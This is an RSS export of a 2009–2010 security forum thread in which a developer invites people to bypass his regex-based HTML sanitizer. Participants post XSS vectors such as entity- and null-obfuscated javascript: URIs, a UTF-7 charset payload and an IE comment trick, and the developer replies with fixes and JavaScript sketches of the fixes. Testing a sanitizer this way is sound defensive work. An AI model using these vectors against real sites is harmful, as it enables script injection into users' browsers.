<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:dc="http://purl.org/dc/elements/1.1/">
    <channel>
        <title>Break a regex-based HTML parser</title>
        <description>Fast question, can you break it?
URL: http://eaea.sirdarckcat.net/testhtml.html

The objective is simple:
Find valid HTML code that will be parsed incorrectly by the parser, AND/OR code that executes (if I forgot to remove some vector).

I will be removing basic JS execution vectors. The CSS parser is not ready yet, so I'll disable CSS completely. Also, namespaces won't be allowed (no XUL nor SVG), and namespaced tags (&amp;lt;asdf:asdf&amp;gt;) will also be disabled for the time being.

Frames won't be allowed (nor will embed/object/video/audio/etc.), and I think that's all :).

If you can execute JS, let me know please :).

On IE I try to honor conditional comments, but I won't support them completely, since they are unsafe by default.

If you find some way to get HTML code where it shouldn't be in weird scenarios, you win!

I have to warn you that code like this:
&amp;lt;a href=&amp;quot;asdf'&amp;gt;&amp;lt;img src=&amp;quot;http://www.google.com&amp;quot;&amp;gt;hello&amp;lt;/a&amp;gt;

Will be parsed as:
&amp;lt;a&amp;gt;hello&amp;lt;/a&amp;gt;

That's because every time I find &amp;quot; in an attribute's name, I delete all attributes in the tag for security reasons.

So this other code (it's important to note there's no closing &amp;quot; quote):
&amp;lt;a href=&amp;quot;asdf'&amp;gt;&amp;lt;img src='http://www.google.com'&amp;gt;hello&amp;lt;/a&amp;gt;

Will be parsed as:
&amp;lt;a&amp;gt;&amp;lt;img src=&amp;quot;http://www.google.com&amp;quot;&amp;gt;hello&amp;lt;/a&amp;gt;

Some may argue that's a vulnerability, but there's no safer way of treating unclosed quotes in attributes.

One other thing: I am only allowing ' and &amp;quot; as quotes (so ` won't work).

So, examples of bypasses I've found (now fixed):
&amp;lt;!--[if true]&amp;gt;&amp;lt;img onerror=alert(1) src=--&amp;gt;
&amp;lt;form action=javascript:alert(1)&amp;gt;&amp;lt;input type=submit&amp;gt;

Protections vary from browser to browser (I will only remove dangerous things on a browser if they are dangerous in that browser).

I will make the CSS parser this week :)

Greetings!!</description>
        <link>http://sla.ckers.org/forum/read.php?2,29259,29259#msg-29259</link>
        <lastBuildDate>Thu, 20 Jun 2013 03:25:03 -0500</lastBuildDate>
        <generator>Phorum 5.2.15a</generator>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?2,29259,35651#msg-35651</guid>
            <title>Re: Break a regex-based HTML parser</title>
            <link>http://sla.ckers.org/forum/read.php?2,29259,35651#msg-35651</link>
            <description><![CDATA[&lt;bgsound src='javascript:alert(1)'&gt; - Opera, IE]]></description>
            <dc:creator>p0deje</dc:creator>
            <category>XSS Info</category>
            <pubDate>Thu, 09 Sep 2010 12:57:34 -0500</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?2,29259,33169#msg-33169</guid>
            <title>Re: Break a regex-based HTML parser</title>
            <link>http://sla.ckers.org/forum/read.php?2,29259,33169#msg-33169</link>
            <description><![CDATA[Well, two problems..<br />
<br />
One is that our old IE6 supports next to none of DOM Level 3. The other is that the bug appears when the code is serialized from DOM to string: if the user does document.documentElement.appendChild(cleanDOM) instead of document.write(cleanDOM.innerHTML), this bug does not happen.<br />
<br />
I hate Gecko bugs :(]]></description>
            <dc:creator>sirdarckcat</dc:creator>
            <category>XSS Info</category>
            <pubDate>Sun, 24 Jan 2010 19:36:12 -0600</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?2,29259,33167#msg-33167</guid>
            <title>Re: Break a regex-based HTML parser</title>
            <link>http://sla.ckers.org/forum/read.php?2,29259,33167#msg-33167</link>
            <description><![CDATA[@sirdarckcat  <br />
<br />
How about using document fragments to check the parsed HTML:-<br />
<br />
https://developer.mozilla.org/En/DOM/Document.createDocumentFragment]]></description>
            <dc:creator>Gareth Heyes</dc:creator>
            <category>XSS Info</category>
            <pubDate>Sun, 24 Jan 2010 09:04:18 -0600</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?2,29259,33165#msg-33165</guid>
            <title>Re: Break a regex-based HTML parser</title>
            <link>http://sla.ckers.org/forum/read.php?2,29259,33165#msg-33165</link>
            <description><![CDATA[niice!<br />
<br />
o=new Option;o.innerHTML='javascript&amp;#x0;:alert(1);';h=o.textContent;a=document.createElement('a');a.setAttribute('href',h);o.appendChild(a);a.appendChild(document.createTextNode('a'));a=o.innerHTML;o.innerHTML=a;o.childNodes[1].href.match(/t:/);<br />
<br />
It's a Gecko bug when serializing DOM to a string :)<br />
<br />
It's not the first one. I added one more thing to the regex that cleans attributes, as well as a pre-parsing step for href attributes.<br />
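<br />
A rough sketch of what href pre-parsing of this kind could look like. It is not the parser's real code: the function names, the scheme list and the choice to strip every control character are assumptions made for illustration.<br />
```javascript
// Hypothetical sketch, not the parser's actual code.
// "\x26" is the ampersand, escaped so the snippet survives being pasted into HTML.
function decodeNumericEntities(text) {
  // Decimal or hex character references; the trailing ";" is optional.
  return text.replace(/\x26#(x[0-9a-f]+|[0-9]+);?/gi, (whole, code) => {
    const isHex = code[0] === 'x' || code[0] === 'X';
    const n = isHex ? parseInt(code.slice(1), 16) : parseInt(code, 10);
    // Out-of-range references become U+FFFD instead of throwing.
    return n > 0x10ffff ? '\ufffd' : String.fromCodePoint(n);
  });
}

function looksLikeScriptUrl(href) {
  // Decode first, then drop control characters and whitespace before checking the scheme.
  const cleaned = decodeNumericEntities(href).replace(/[\u0000-\u0020\u007f-\u009f]/g, '');
  return /^(?:javascript|vbscript):/i.test(cleaned);
}

console.log(looksLikeScriptUrl('javascript\x26#0:alert(1)')); // true
console.log(looksLikeScriptUrl('http://www.google.com')); // false
```
The check runs on the decoded and stripped value, so a NUL hidden inside the scheme name no longer changes the result.<br />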
<br />
That should cover similar bugs. I'm thinking about how to solve problems like this long term; sadly I can't just do innerHTML+=''; browsers suck =/.<br />
<br />
Thanks!!! :)]]></description>
            <dc:creator>sirdarckcat</dc:creator>
            <category>XSS Info</category>
            <pubDate>Sun, 24 Jan 2010 07:32:22 -0600</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?2,29259,33160#msg-33160</guid>
            <title>Re: Break a regex-based HTML parser</title>
            <link>http://sla.ckers.org/forum/read.php?2,29259,33160#msg-33160</link>
            <description><![CDATA[Cool nice ones]]></description>
            <dc:creator>Gareth Heyes</dc:creator>
            <category>XSS Info</category>
            <pubDate>Sat, 23 Jan 2010 16:20:38 -0600</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?2,29259,33158#msg-33158</guid>
            <title>Re: Break a regex-based HTML parser</title>
            <link>http://sla.ckers.org/forum/read.php?2,29259,33158#msg-33158</link>
            <description><![CDATA[<i>Nice</i> one doody! I think that's valid :) It can even be obfuscated some more<br />
<br />
&lt;a href=&quot;javascript &amp;#x:alert('1');&quot;&gt;click me&lt;/a&gt;]]></description>
            <dc:creator>Anonymous User</dc:creator>
            <category>XSS Info</category>
            <pubDate>Sat, 23 Jan 2010 14:36:56 -0600</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?2,29259,33157#msg-33157</guid>
            <title>Re: Break a regex-based HTML parser</title>
            <link>http://sla.ckers.org/forum/read.php?2,29259,33157#msg-33157</link>
            <description><![CDATA[Hi, first post here =). Hope this is valid:<br />
<br />
&lt;a href=&quot;javascript&amp;#0:alert('1');&quot;&gt;click me&lt;/a&gt;]]></description>
            <dc:creator>doody</dc:creator>
            <category>XSS Info</category>
            <pubDate>Sat, 23 Jan 2010 13:13:30 -0600</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?2,29259,32980#msg-32980</guid>
            <title>Re: Break a regex-based HTML parser</title>
            <link>http://sla.ckers.org/forum/read.php?2,29259,32980#msg-32980</link>
            <description><![CDATA[https://twitter.com/theharmonyguy/status/7666627119]]></description>
            <dc:creator>sirdarckcat</dc:creator>
            <category>XSS Info</category>
            <pubDate>Tue, 12 Jan 2010 08:42:03 -0600</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?2,29259,32502#msg-32502</guid>
            <title>Re: Break a regex-based HTML parser</title>
            <link>http://sla.ckers.org/forum/read.php?2,29259,32502#msg-32502</link>
            <description><![CDATA[I wish that old maluc was still with us, he always got some crazy shit going on with vectors, talkin' about 4 years ago on sla.ckers.]]></description>
            <dc:creator>rvdh</dc:creator>
            <category>XSS Info</category>
            <pubDate>Fri, 27 Nov 2009 12:10:30 -0600</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?2,29259,32488#msg-32488</guid>
            <title>Re: Break a regex-based HTML parser</title>
            <link>http://sla.ckers.org/forum/read.php?2,29259,32488#msg-32488</link>
            <description><![CDATA[nice :) I hate IE hahaha<br />
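<br />
For reference, a rough sketch of why a vector like &lt;!---&gt;&lt;script&gt;alert(1)&lt;/script&gt;--&gt; can slip past a regex. Both patterns are made up for illustration and are not the parser's real code. The assumption is that IE ends the comment right at &lt;!---&gt;, which as far as I know is also what the HTML5 tokenizer specifies for &lt;!--&gt; and &lt;!---&gt;.<br />
```javascript
// Hypothetical sketch, not the parser's actual code.
// "\x3c" is the less-than sign, escaped so the snippet survives being pasted into HTML.
// Naive pattern: a comment runs until the first "-->" after the opening dashes.
const NAIVE_COMMENT = /^\x3c!--[\s\S]*?-->/;
// Browser-like pattern: the short forms with zero or one extra dash before ">"
// count as complete (empty) comments, and "--!>" also closes a comment.
const BROWSER_LIKE_COMMENT = /^\x3c!--(?:-?>|[\s\S]*?--!?>)/;

// Length of the comment found at the start of html, or 0 if there is none.
function commentLength(re, html) {
  const m = re.exec(html);
  return m === null ? 0 : m[0].length;
}

const vector = '\x3c!--->\x3cscript>alert(1)\x3c/script>-->';
// The naive pattern swallows the whole string, so the script looks like comment text.
console.log(commentLength(NAIVE_COMMENT, vector) === vector.length); // true
// The browser-like pattern stops after six characters, leaving the script as live markup.
console.log(commentLength(BROWSER_LIKE_COMMENT, vector)); // 6
```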
<br />
thanks!! :D now I have to break jsreg again.. hahaha]]></description>
            <dc:creator>sirdarckcat</dc:creator>
            <category>XSS Info</category>
            <pubDate>Thu, 26 Nov 2009 12:06:57 -0600</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?2,29259,32483#msg-32483</guid>
            <title>Re: Break a regex-based HTML parser</title>
            <link>http://sla.ckers.org/forum/read.php?2,29259,32483#msg-32483</link>
            <description><![CDATA[So my friend, you tempted me on Twitter, and if you wanted to social-engineer me into testing your HTML parser, it worked :)<br />
<br />
IE only:-<br />
&lt;!---&gt;&lt;script&gt;alert(1)&lt;/script&gt;--&gt;]]></description>
            <dc:creator>Gareth Heyes</dc:creator>
            <category>XSS Info</category>
            <pubDate>Thu, 26 Nov 2009 04:51:55 -0600</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?2,29259,29444#msg-29444</guid>
            <title>Re: Break a regex-based HTML parser</title>
            <link>http://sla.ckers.org/forum/read.php?2,29259,29444#msg-29444</link>
            <description><![CDATA[Now I'm using JSReg:<br />
http://eaea.sirdarckcat.net/testhtml.html<br />
<br />
So, I'm still working on the CSS parser.<br />
<br />
I was going to be the one applying the attributes to the elements, but I discovered that that's waaaaaaaaaay too slow, even with algorithmic-fu stuff haha. It's been the biggest algorithmic challenge I've had since the informatics olympiads/ACM, but it's impossible to optimize. After reviewing the WebKit/Mozilla implementations, their solutions have the same or a higher complexity, but my code lives in JS so it's slower :( (and they are also slow on the same rules I have problems with, like nth-child and the like).<br />
<br />
Now I'll just filter the CSS (with a JSReg-like approach), unlike the HTML parser, for example, which was reconstructing the DOM and building it from scratch.]]></description>
            <dc:creator>sirdarckcat</dc:creator>
            <category>XSS Info</category>
            <pubDate>Tue, 21 Jul 2009 22:18:49 -0500</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?2,29259,29319#msg-29319</guid>
            <title>Re: Break a regex-based HTML parser</title>
            <link>http://sla.ckers.org/forum/read.php?2,29259,29319#msg-29319</link>
            <description><![CDATA[I think document.write protects against this, but that's purely empirical knowledge.<br />
<br />
I will disallow Content-Type in http-equiv then :), just to be sure<br />
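<br />
A rough sketch of such a check, not the parser's real code: the function name and the plain attribute object are made up for illustration, and also rejecting a charset attribute is an extra assumption on top of the http-equiv rule.<br />
```javascript
// Hypothetical sketch, not the parser's actual code.
// attrs is a plain object mapping attribute names to values for one meta tag.
function isCharsetChangingMeta(attrs) {
  for (const [name, value] of Object.entries(attrs)) {
    const key = name.trim().toLowerCase();
    // Assumption: a charset attribute is treated as an attempt to change the encoding too.
    if (key === 'charset') {
      return true;
    }
    // http-equiv="Content-Type" is rejected whatever its content says.
    if (key === 'http-equiv' && String(value).trim().toLowerCase() === 'content-type') {
      return true;
    }
  }
  return false;
}

console.log(isCharsetChangingMeta({ 'http-equiv': 'Content-Type', content: 'text/html; charset=UTF-7' })); // true
console.log(isCharsetChangingMeta({ name: 'description', content: 'hello' })); // false
```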
<br />
Greetz!!]]></description>
            <dc:creator>sirdarckcat</dc:creator>
            <category>XSS Info</category>
            <pubDate>Thu, 16 Jul 2009 02:12:12 -0500</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?2,29259,29306#msg-29306</guid>
            <title>Re: Break a regex-based HTML parser</title>
            <link>http://sla.ckers.org/forum/read.php?2,29259,29306#msg-29306</link>
            <description><![CDATA[<pre class="bbcode">
&lt;head&gt;
&lt;meta http-equiv=&quot;Content-Type&quot; content=&quot;text/html; charset=UTF-7&quot;&gt;
+ADw-script+AD4-alert(1)+ADw-/script+AD4-</pre>
<br />
Doesn't trigger an alert - but should work in other setups. I think changing the charset should be prohibited. Thoughts?]]></description>
            <dc:creator>Anonymous User</dc:creator>
            <category>XSS Info</category>
            <pubDate>Wed, 15 Jul 2009 10:54:47 -0500</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?2,29259,29303#msg-29303</guid>
            <title>Re: Break a regex-based HTML parser</title>
            <link>http://sla.ckers.org/forum/read.php?2,29259,29303#msg-29303</link>
            <description><![CDATA[<blockquote class="bbcode"><div><small>Quote<br/></small><strong></strong><br/>&lt;html&gt;<br />
&lt;head&gt;<br />
&lt;title&gt;hello, world.&lt;/title&gt;<br />
&lt;/head&gt;<br />
&lt;form action=&amp;#160;javascript:alert(1)&gt;&lt;meta http-equiv=&quot;Content-Type&quot; content=&quot;text/html; charset=UTF-7&quot; /&gt;&lt;input type=submit&gt;&lt;/form&gt;+ADwAcwBjAHIAaQBwAHQAPgBhAGwAZQByAHQAKAAxACkAPAAvAHMAYwByAGkAcAB0AD4-<br />
&lt;/body&gt;<br />
&lt;/html&gt;</div></blockquote>hm.. why should it work? haha I do document.write(), which ignores Content-Type metas afaik (this is a bug I will address when events are working perfectly, and that will happen when I manage to finish the CSS parser).<br />
<br />
<blockquote class="bbcode"><div><small>Quote<br/></small><strong></strong><br/> @sdc: Yes :) I was trying to say good work in my own words. The background gets stripped only on the browsers where it would be executed - Opera and IE.</div></blockquote>oh!! thanks then haha :D <br />
<br />
<blockquote class="bbcode"><div><small>Quote<br/></small><strong></strong><br/>&lt;img src=javascript&amp;#4864:alert(1)&gt; </div></blockquote>very nice gareth!! any particular reason to choose that char? fuzzing? do you have fuzz results? haha<br />
<br />
Greetz!!]]></description>
            <dc:creator>sirdarckcat</dc:creator>
            <category>XSS Info</category>
            <pubDate>Wed, 15 Jul 2009 07:23:42 -0500</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?2,29259,29297#msg-29297</guid>
            <title>Re: Break a regex-based HTML parser</title>
            <link>http://sla.ckers.org/forum/read.php?2,29259,29297#msg-29297</link>
            <description><![CDATA[Opera only vector:-<br />
&lt;img src=javascript&amp;#4864:alert(1)&gt;<br />
<br />
Reproduces intermittently in Opera]]></description>
            <dc:creator>Gareth Heyes</dc:creator>
            <category>XSS Info</category>
            <pubDate>Wed, 15 Jul 2009 05:15:26 -0500</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?2,29259,29295#msg-29295</guid>
            <title>Re: Break a regex-based HTML parser</title>
            <link>http://sla.ckers.org/forum/read.php?2,29259,29295#msg-29295</link>
            <description><![CDATA[@sdc: Yes :) I was trying to say good work in my own words. The background gets stripped only on the browsers where it would be executed - Opera and IE.]]></description>
            <dc:creator>Anonymous User</dc:creator>
            <category>XSS Info</category>
            <pubDate>Wed, 15 Jul 2009 04:16:37 -0500</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?2,29259,29294#msg-29294</guid>
            <title>Re: Break a regex-based HTML parser</title>
            <link>http://sla.ckers.org/forum/read.php?2,29259,29294#msg-29294</link>
            <description><![CDATA[Sorry, I should have tested it. I thought the HTML decoder was removing the entities, but I couldn't see the nulls etc. in the source. Anyway, this should work (without a parent charset):-<br />
<br />
&lt;html&gt;<br />
&lt;head&gt;<br />
&lt;title&gt;hello, world.&lt;/title&gt;<br />
&lt;/head&gt;<br />
&lt;form action=&amp;#160;javascript:alert(1)&gt;&lt;meta http-equiv=&quot;Content-Type&quot; content=&quot;text/html; charset=UTF-7&quot; /&gt;&lt;input type=submit&gt;&lt;/form&gt;+ADwAcwBjAHIAaQBwAHQAPgBhAGwAZQByAHQAKAAxACkAPAAvAHMAYwByAGkAcAB0AD4-<br />
&lt;/body&gt;<br />
&lt;/html&gt;]]></description>
            <dc:creator>Gareth Heyes</dc:creator>
            <category>XSS Info</category>
            <pubDate>Wed, 15 Jul 2009 04:11:46 -0500</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?2,29259,29284#msg-29284</guid>
            <title>Re: Break a regex-based HTML parser</title>
            <link>http://sla.ckers.org/forum/read.php?2,29259,29284#msg-29284</link>
            <description><![CDATA[@<b>gareth</b><br />
Thanks! But I can't reproduce it; on which browser?<br />
<br />
My tests:<br />
On Firefox 3:<br />
The requested URL /ï¿½jï¿½aï¿½vï¿½ascriptï¿½:alert(1) was not found on this server.<br />
<br />
On IE8 and IETab:<br />
&lt;FORM  action=&quot;?j?a?v?ascript?:alert(1)&quot;&gt;<br />
<br />
On Opera 9:<br />
The requested URL /ï¿½jï¿½aï¿½vï¿½ascriptï¿½:alert(1) was not found on this server.<br />
<br />
On Chrome 3:<br />
The requested URL /&amp; was not found on this server.<br />
<br />
On Safari:<br />
The requested URL /&amp; was not found on this server.<br />
<br />
<br />
@<b>.mario</b><br />
I can't reproduce :(<br />
<br />
this<br />
<br />
&lt;body<br />
&lt;li background=&quot;javascript:alert(1)&quot;<br />
<br />
gets interpreted as:<br />
&lt;head&gt;&lt;/head&gt;&lt;body&gt;&lt;li background=&quot;javascript:alert(1)&quot;&gt;&lt;/li&gt;&lt;/body&gt;<br />
<br />
and Firefox doesn't execute javascript: URIs in background attributes (as far as I've tested). Am I missing something? =/<br />
<br />
Greetings!!]]></description>
            <dc:creator>sirdarckcat</dc:creator>
            <category>XSS Info</category>
            <pubDate>Tue, 14 Jul 2009 21:09:16 -0500</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?2,29259,29282#msg-29282</guid>
            <title>Re: Break a regex-based HTML parser</title>
            <link>http://sla.ckers.org/forum/read.php?2,29259,29282#msg-29282</link>
            <description><![CDATA[<pre class="bbcode">
&lt;body
&lt;li background=&quot;javascript:alert(1)&quot;</pre>
<br />
Works in FF, Chrome but not in Opera - well played!]]></description>
            <dc:creator>Anonymous User</dc:creator>
            <category>XSS Info</category>
            <pubDate>Tue, 14 Jul 2009 17:34:22 -0500</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?2,29259,29278#msg-29278</guid>
            <title>Re: Break a regex-based HTML parser</title>
            <link>http://sla.ckers.org/forum/read.php?2,29259,29278#msg-29278</link>
            <description><![CDATA[&lt;form action=&amp;#000000000j&amp;#000000000a&amp;#000000000v&amp;#000000000ascript&amp;#000000000:alert(1)&gt;]]></description>
            <dc:creator>Gareth Heyes</dc:creator>
            <category>XSS Info</category>
            <pubDate>Tue, 14 Jul 2009 14:25:12 -0500</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?2,29259,29259#msg-29259</guid>
            <title>Break a regex-based HTML parser</title>
            <link>http://sla.ckers.org/forum/read.php?2,29259,29259#msg-29259</link>
            <description><![CDATA[Fast question, can you break it?<br />
URL: http://eaea.sirdarckcat.net/testhtml.html<br />
<br />
The objective is simple:<br />
<blockquote class="bbcode"><div><small>Quote<br/></small><strong></strong><br/>Find valid HTML code that will be parsed incorrectly by the parser, AND/OR code that executes (if I forgot to remove some vector).</div></blockquote>
<br />
I will be removing basic JS execution vectors. The CSS parser is not ready yet, so I'll disable CSS completely. Also, namespaces won't be allowed (no XUL nor SVG), and namespaced tags (&lt;asdf:asdf&gt;) will also be disabled for the time being.<br />
<br />
Frames won't be allowed (nor will embed/object/video/audio/etc.), and I think that's all :).<br />
<br />
If you can execute JS, let me know please :).<br />
<br />
On IE I try to honor conditional comments, but I won't support them completely, since they are <a href="http://eaea.sirdarckcat.net/conditionalcomments.html" rel="nofollow" >unsafe</a> by <a href="http://eaea.sirdarckcat.net/conditionalcomments2.html" rel="nofollow" >default</a>.<br />
<br />
If you find some way to get HTML code where it shouldn't be in weird scenarios, you win!<br />
<br />
I have to warn you that code like this:<br />
<pre class="bbcode">&lt;a href=&quot;asdf'&gt;&lt;img src=&quot;http://www.google.com&quot;&gt;hello&lt;/a&gt;</pre>
<br />
Will be parsed as:<br />
<pre class="bbcode">&lt;a&gt;hello&lt;/a&gt;</pre>
<br />
That's because every time I find &quot; in an attribute's name, I delete all attributes in the tag for security reasons.<br />
<br />
So this other code (it's important to note there's no closing &quot; quote):<br />
<pre class="bbcode">&lt;a href=&quot;asdf'&gt;&lt;img src='http://www.google.com'&gt;hello&lt;/a&gt;</pre>
<br />
Will be parsed as:<br />
<pre class="bbcode">&lt;a&gt;&lt;img src=&quot;http://www.google.com&quot;&gt;hello&lt;/a&gt;</pre>
<br />
Some may argue that's a vulnerability, but there's no safer way of treating unclosed quotes in attributes.<br />
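<br />
As a rough illustration of that rule (not the real parser code: parseAttributes, its regex and the way the tag text is cut out are all made up for this sketch), the attribute step could look like this:<br />
```javascript
// Hypothetical sketch, not the parser's actual code.
// tagBody is the text between the tag name and the closing bracket.
// "\x3c" is the less-than sign, escaped so the snippet survives being pasted into HTML.
function parseAttributes(tagBody) {
  const attrs = {};
  // A name, optionally followed by = and a "double", 'single' or bare value.
  const attrRe = /([^\s=]+)(?:\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s"']+)))?/g;
  let m;
  while ((m = attrRe.exec(tagBody)) !== null) {
    const name = m[1];
    if (name.includes('"')) {
      return {}; // a quote inside a name: drop every attribute of the tag
    }
    const value = [m[2], m[3], m[4]].find((v) => v !== undefined);
    attrs[name.toLowerCase()] = value === undefined ? '' : value;
  }
  return attrs;
}

// href swallows everything up to the next ", so the leftover text becomes a name with a quote in it.
console.log(parseAttributes(' href="asdf\'>\x3cimg src="http://www.google.com"')); // {}
// No closing " at all: the quoted value never matches, so "asdf' is read as a name.
console.log(parseAttributes(' href="asdf\'')); // {}
console.log(parseAttributes(" src='http://www.google.com'")); // { src: 'http://www.google.com' }
```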
<br />
One other thing: I am only allowing ' and &quot; as quotes (so ` won't work).<br />
<br />
So, examples of bypasses I've found (now fixed):<br />
<pre class="bbcode">&lt;!--[if true]&gt;&lt;img onerror=alert(1) src=--&gt;</pre>
<pre class="bbcode">&lt;form action=javascript:alert(1)&gt;&lt;input type=submit&gt;</pre>
<br />
Protections vary from browser to browser (I will only remove dangerous things on a browser if they are dangerous in that browser).<br />
<br />
I will make the CSS parser this week :)<br />
<br />
Greetings!!]]></description>
            <dc:creator>sirdarckcat</dc:creator>
            <category>XSS Info</category>
            <pubDate>Mon, 13 Jul 2009 20:59:10 -0500</pubDate>
        </item>
    </channel>
</rss>
